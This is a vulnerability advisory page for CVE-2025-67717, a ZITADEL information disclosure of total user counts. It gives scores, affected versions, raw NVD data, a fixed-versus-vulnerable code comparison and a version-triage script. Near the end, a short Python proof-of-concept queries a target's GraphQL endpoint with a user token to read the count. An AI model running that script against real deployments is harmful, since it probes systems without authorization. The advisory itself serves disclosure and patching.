Security Vulnerability Report
CVE-2025-67717 CVSS 4.3 MEDIUM

CVE-2025-67717

Published: 2025-12-11 01:16:01
Last Modified: 2026-02-02 15:10:38

Description

ZITADEL is an open-source identity infrastructure tool. Versions 2.44.0 through 3.4.4 and 4.0.0-rc.1 through 4.7.1 disclose the total number of instance users to authenticated users, regardless of their specific permissions. While this does not leak individual user data or PII, disclosing the total user count via the totalResult field constitutes an information disclosure vulnerability that may be sensitive in certain contexts. This issue is fixed in versions 3.4.5 and 4.7.2.
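The defect described above is an aggregate field (totalResult) that is computed over the whole instance while the rows next to it are filtered by the caller's permissions. The following example, added here and not ZITADEL's own code, shows that pattern beside its hardened form on a constructed in-memory user set: the hardened version runs the authorization filter first and derives both the page and the count from the same filtered set, so pagination still works without leaking the instance-wide total. The permission names ("instance.user.read", "org.user.read") and the User and Caller types are assumptions for the illustration.

```python
from dataclasses import dataclass
from typing import Dict, List

# Hypothetical permission model and constructed sample data; not ZITADEL's
# real authorization code.


@dataclass(frozen=True)
class User:
    id: str
    user_name: str
    org_id: str


@dataclass(frozen=True)
class Caller:
    user_id: str
    org_id: str
    permissions: frozenset


# Constructed instance: three users in org-a, two in org-b.
INSTANCE_USERS: List[User] = [
    User("u1", "alice", "org-a"),
    User("u2", "bob", "org-a"),
    User("u3", "carol", "org-a"),
    User("u4", "dave", "org-b"),
    User("u5", "erin", "org-b"),
]


def can_see(caller: Caller, user: User) -> bool:
    """Row-level authorization: instance-wide readers see everyone, org readers
    see their own organisation, everyone else sees only themselves."""
    if "instance.user.read" in caller.permissions:
        return True
    if "org.user.read" in caller.permissions:
        return user.org_id == caller.org_id
    return user.id == caller.user_id


def list_users_vulnerable(caller: Caller, users: List[User],
                          limit: int = 100, offset: int = 0) -> Dict:
    """'Before' pattern (the CWE-497 style leak): rows are filtered per caller,
    but totalResult is taken from the unfiltered instance-wide set."""
    total = len(users)  # counted before authorization is applied
    visible = [u for u in users if can_see(caller, u)]
    page = visible[offset:offset + limit]
    return {"totalResult": total, "result": [u.user_name for u in page]}


def list_users_fixed(caller: Caller, users: List[User],
                     limit: int = 100, offset: int = 0) -> Dict:
    """Hardened pattern: filter first, then derive both the page and
    totalResult from the same visible set. The count still covers all visible
    rows, not just the returned page, so clients can paginate correctly."""
    visible = [u for u in users if can_see(caller, u)]
    page = visible[offset:offset + limit]
    return {"totalResult": len(visible), "result": [u.user_name for u in page]}


if __name__ == "__main__":
    org_reader = Caller("u2", "org-a", frozenset({"org.user.read"}))
    print(list_users_vulnerable(org_reader, INSTANCE_USERS, limit=2))
    print(list_users_fixed(org_reader, INSTANCE_USERS, limit=2))
```

The general rule the fixed version follows is that any aggregate returned alongside authorized rows (counts, sums, "has more" flags) must be computed from the same authorization-filtered query, never from a separate unfiltered one.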

CVSS Details

CVSS 3.1 Score (primary): 4.3
Severity: MEDIUM
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
CVSS 4.0 Score (secondary): 5.3 MEDIUM
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
Weakness: CWE-497

Configurations (Affected Products)

cpe:2.3:a:zitadel:zitadel:*:*:*:*:*:*:*:* - VULNERABLE (2.44.0 up to and including 2.71.19)
cpe:2.3:a:zitadel:zitadel:*:*:*:*:*:*:*:* - VULNERABLE (3.0.0 up to but excluding 3.4.5)
cpe:2.3:a:zitadel:zitadel:*:*:*:*:*:*:*:* - VULNERABLE (4.0.0 up to but excluding 4.7.2)

Affected version ranges as stated in the advisory:
ZITADEL 2.44.0 - 3.4.4 (fixed in 3.4.5)
ZITADEL 4.0.0-rc.1 - 4.7.1 (fixed in 4.7.2)
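Deciding whether a deployment falls inside the ranges above needs a correct semver comparison, because the lower bound of the 4.x range is a pre-release (4.0.0-rc.1) that sorts below 4.0.0. The following checker is an added example, not ZITADEL's or NVD's code; it encodes the two ranges from this advisory (2.44.0 up to but excluding 3.4.5, and 4.0.0-rc.1 up to but excluding 4.7.2), implements semver precedence including pre-release identifiers, and triages a constructed {instance: version} inventory to the fixed release each one needs.

```python
import re
from typing import Optional

# Affected ranges taken from the advisory text on this page. Each entry is
# (first affected version, first fixed version) for that release line.
AFFECTED_RANGES = [
    ("2.44.0", "3.4.5"),
    ("4.0.0-rc.1", "4.7.2"),
]

_SEMVER_RE = re.compile(
    r"^v?(\d+)\.(\d+)\.(\d+)"      # MAJOR.MINOR.PATCH, optional leading 'v'
    r"(?:-([0-9A-Za-z.-]+))?"      # optional pre-release, e.g. rc.1
    r"(?:\+[0-9A-Za-z.-]+)?$"      # optional build metadata (ignored for precedence)
)


def _prerelease_key(pre: Optional[str]) -> tuple:
    """Order pre-release identifiers as semver precedence requires: a release
    (no pre-release) outranks any pre-release of the same MAJOR.MINOR.PATCH,
    numeric identifiers sort before alphanumeric ones, and a shorter identifier
    list sorts lower when all shared identifiers are equal."""
    if pre is None:
        return (1,)
    parts = []
    for ident in pre.split("."):
        if ident.isdigit():
            parts.append((0, int(ident), ""))
        else:
            parts.append((1, 0, ident))
    return (0, tuple(parts))


def version_key(text: str) -> tuple:
    """Parse a semver string into a tuple that sorts by precedence."""
    m = _SEMVER_RE.match(text.strip())
    if not m:
        raise ValueError(f"not a semantic version: {text!r}")
    major, minor, patch = (int(m.group(i)) for i in (1, 2, 3))
    return (major, minor, patch, _prerelease_key(m.group(4)))


def fixed_version_for(version: str) -> Optional[str]:
    """Return the first fixed release if `version` is in an affected range,
    otherwise None. Pre-releases of a fixed version (e.g. 4.7.2-rc.1) sort
    below it and are therefore still reported as affected; the advisory only
    names the final releases as fixed, so this is the conservative reading."""
    key = version_key(version)
    for start, fixed in AFFECTED_RANGES:
        if version_key(start) <= key < version_key(fixed):
            return fixed
    return None


def triage_inventory(inventory: dict) -> dict:
    """Map each {name: version} entry to the release it needs, or None when the
    version is already outside the affected ranges."""
    return {name: fixed_version_for(ver) for name, ver in inventory.items()}


if __name__ == "__main__":
    # Constructed sample inventory, not real hosts.
    sample = {
        "idp-prod": "v3.4.4",
        "idp-staging": "4.0.0-rc.1",
        "idp-dev": "4.7.2",
        "legacy": "2.43.0",
    }
    for name, fix in triage_inventory(sample).items():
        print(f"{name}: {'upgrade to ' + fix if fix else 'not affected'}")
```

Note that the NVD CPE match data lists the 4.x range as starting at 4.0.0, while the description starts it at 4.0.0-rc.1; the checker follows the description, which is the wider and safer reading.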

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-67717 PoC - ZITADEL User Count Information Disclosure
# This PoC demonstrates how an authenticated user can retrieve
# the total number of users in a ZITADEL instance

import requests
import json

TARGET_URL = "https://your-zitadel-instance.com"
ATTACKER_TOKEN = "your-authenticated-user-token"


def exploit_user_count_disclosure():
    """
    Exploit CVE-2025-67717 by querying the total user count
    without proper authorization checks
    """
    headers = {
        "Authorization": f"Bearer {ATTACKER_TOKEN}",
        "Content-Type": "application/json"
    }

    # Query to get users list (with low privilege account)
    query = {
        "query": """
        query {
            users(query: {}) {
                totalResult
                nodes {
                    id
                    userName
                }
            }
        }
        """
    }

    response = requests.post(
        f"{TARGET_URL}/graphql",
        headers=headers,
        json=query
    )

    if response.status_code == 200:
        data = response.json()
        total_users = data.get("data", {}).get("users", {}).get("totalResult")
        print(f"[+] Total users in instance: {total_users}")
        return total_users
    else:
        print(f"[-] Request failed: {response.status_code}")
        return None


if __name__ == "__main__":
    exploit_user_count_disclosure()
```

References

https://github.com/zitadel/zitadel/commit/826039c6208fe71df57b3a94c982b5ac5b0af12c (Patch)
https://github.com/zitadel/zitadel/security/advisories/GHSA-f4cf-9rvr-2rcx (Patch, Vendor Advisory)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67717", "sourceIdentifier": "[email protected]", "published": "2025-12-11T01:16:01.027", "lastModified": "2026-02-02T15:10:37.503", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ZITADEL is an open-source identity infrastructure tool. Versions 2.44.0 through 3.4.4 and 4.0.0-rc.1 through 4.7.1 disclose the total number of instance users to authenticated users, regardless of their specific permissions. While this does not leak individual user data or PII, disclosing the total user count via the totalResult field constitutes an information disclosure vulnerability that may be sensitive in certain contexts. This issue is fixed in versions 3.4.5 and 4.7.2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-497"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zitadel:zitadel:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.44.0", "versionEndIncluding": "2.71.19", "matchCriteriaId": "1578A112-B6ED-4453-A4A8-93D034A980DB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zitadel:zitadel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.0.0", "versionEndExcluding": "3.4.5", "matchCriteriaId": "E455D450-9A02-47A4-AC6B-3A23B477A543"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zitadel:zitadel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.7.2", "matchCriteriaId": "FBFDBC95-1E62-4EFA-9D4A-ECCC074F112B"}]}]}], "references": [{"url": "https://github.com/zitadel/zitadel/commit/826039c6208fe71df57b3a94c982b5ac5b0af12c", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/zitadel/zitadel/security/advisories/GHSA-f4cf-9rvr-2rcx", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}